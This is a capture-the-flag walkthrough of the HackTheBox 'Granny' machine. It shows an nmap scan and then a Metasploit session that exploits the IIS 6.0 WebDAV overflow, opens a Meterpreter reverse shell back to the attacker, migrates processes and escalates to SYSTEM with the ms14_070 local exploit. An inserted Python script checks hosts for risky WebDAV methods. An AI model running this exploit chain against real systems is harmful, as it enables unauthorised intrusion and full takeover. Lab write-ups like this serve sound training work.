From the HacktheBox
twitter:@ikk_hck
Enumeration
Anyway, nmap.
$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
Here are the results.
# Nmap 7.91 scan initiated Sat May 8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
You can see that Microsoft IIS httpd 6.0 is running, with WebDAV enabled and a long list of potentially risky methods (PUT, MOVE, PROPFIND and so on) allowed.
I'll look for an exploit for it in Metasploit.
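The "potentially risky methods" line above comes from nmap sending an OPTIONS request and reading the Allow and Public headers. As an added example (not part of the original post), the script below does the same check so you can inventory your own IIS/WebDAV hosts for methods that should not be exposed; the sample response is constructed to match the nmap output above and is not captured from the box, and `check_host` is a helper name assumed here.

```python
import re
import socket

# Same method set that nmap's http-methods script reports as "potentially risky":
# all of them give write or metadata access to WebDAV content and should not be
# reachable anonymously on a production host.
RISKY_METHODS = {"TRACE", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
                 "SEARCH", "MKCOL", "LOCK", "UNLOCK", "PUT"}

def build_options_request(host, path="/"):
    """Raw HTTP/1.1 OPTIONS request for the given virtual host and path."""
    return (f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Connection: close\r\n\r\n").encode()

def parse_methods(raw_response):
    """Return the method sets advertised in the Allow and Public response headers."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    found = {}
    for name in ("Allow", "Public"):
        m = re.search(rf"^{name}:\s*(.+)$", head, re.IGNORECASE | re.MULTILINE)
        found[name] = {t.strip().upper() for t in m.group(1).split(",")} if m else set()
    return found

def risky_methods(raw_response):
    """Methods from either header that fall in RISKY_METHODS, sorted for stable reporting."""
    methods = parse_methods(raw_response)
    return sorted((methods["Allow"] | methods["Public"]) & RISKY_METHODS)

def check_host(host, port=80, path="/", timeout=5.0):
    """Send one OPTIONS request over a plain socket (hypothetical helper) and report risky methods."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_options_request(host, path))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return risky_methods(b"".join(chunks))

# Constructed sample response modelled on the nmap http-webdav-scan output above.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print("risky methods in sample:", risky_methods(SAMPLE_RESPONSE))
```

Note that PUT appears only in the Public header, not in Allow, which is why the union of both headers is checked rather than Allow alone.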
$ msfconsole
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
msf6 > search iis 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
1 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
Exploit
I found it, set the IP addresses and other options, and ran it.
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700
meterpreter >
The exploit succeeded and we have a Meterpreter session.
PE (Privilege Escalation)
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
I try to check which user I'm running as, but even that fails.
Let's look at the process list.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
784 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1084 396 cisvc.exe
1124 396 svchost.exe
1180 396 inetinfo.exe
1216 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1464 396 svchost.exe
1628 396 svchost.exe
1732 396 dllhost.exe
1816 396 alg.exe
1832 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1900 396 dllhost.exe
2120 396 vssvc.exe
2176 1464 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2244 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2308 2176 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2488 596 wmiprvse.exe
Which process am I in?
meterpreter > getpid
Current pid: 2308
meterpreter > getpid
Current pid: 2308
I see. I'm in rundll32.exe (PID 2308), which has no user shown, so I'll migrate into one of the processes running as "NT AUTHORITY\NETWORK SERVICE".
meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
Checking the user again now shows "NT AUTHORITY\NETWORK SERVICE".
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Background the session and return to msfconsole to look for a local exploit that can be used for PE.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
I tried "ms14_058_track_popup_menu", but it doesn't work: the exploit runs but no session comes back.
Next, try "ms14_070_tcpip_ioctl".
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2003 SP2
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
It succeeded: checking the user in the new session shows "NT AUTHORITY\SYSTEM".
Then follow the steps below to explore the filesystem and find the flag.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 07:27:12 -0700 ADFS
100777/rwxrwxrwx 0 fil 2017-04-12 07:04:44 -0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-04-12 07:04:44 -0700 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Documents and Settings
40777/rwxrwxrwx 0 dir 2017-04-12 07:17:24 -0700 FPSE_search
100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 IO.SYS
40777/rwxrwxrwx 0 dir 2017-04-12 07:16:33 -0700 Inetpub
100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 MSDOS.SYS
100555/r-xr-xr-x 47772 fil 2007-02-18 04:00:00 -0800 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-04-12 06:43:02 -0700 Program Files
40777/rwxrwxrwx 0 dir 2017-04-12 12:02:02 -0700 RECYCLER
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 System Volume Information
40777/rwxrwxrwx 0 dir 2017-04-12 06:41:07 -0700 WINDOWS
100666/rw-rw-rw- 208 fil 2017-04-12 06:42:08 -0700 boot.ini
100444/r--r--r-- 297072 fil 2007-02-18 04:00:00 -0800 ntldr
0000/--------- 0 fif 1969-12-31 16:00:00 -0800 pagefile.sys
40777/rwxrwxrwx 0 dir 2017-04-12 07:05:06 -0700 wmpub
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Administrator
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 All Users
40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Default User
40777/rwxrwxrwx 0 dir 2017-04-12 12:19:46 -0700 Lakis
40777/rwxrwxrwx 0 dir 2017-04-12 07:08:32 -0700 LocalService
40777/rwxrwxrwx 0 dir 2017-04-12 07:08:31 -0700 NetworkService
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
--------- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Application Data
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Cookies
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Desktop
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Favorites
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Local Settings
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 My Documents
100666/rw-rw-rw- 786432 fil 2017-04-12 07:12:15 -0700 NTUSER.DAT
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 NetHood
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 PrintHood
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Recent
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 SendTo
40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Start Menu
100666/rw-rw-rw- 0 fil 2017-04-12 07:12:15 -0700 Sti_Trace.log
40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Templates
40777/rwxrwxrwx 0 dir 2017-04-12 11:48:10 -0700 UserData
100666/rw-rw-rw- 1024 fil 2017-04-12 07:12:15 -0700 ntuser.dat.LOG
100666/rw-rw-rw- 178 fil 2017-04-12 07:12:15 -0700 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
--------- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-12 07:28:50 -0700 root.txt
Incidentally
If you try PE without first migrating out of the original rundll32.exe process, you get the following: the module cannot even query the session's SID, so it fails before doing anything.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.5:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
Good night.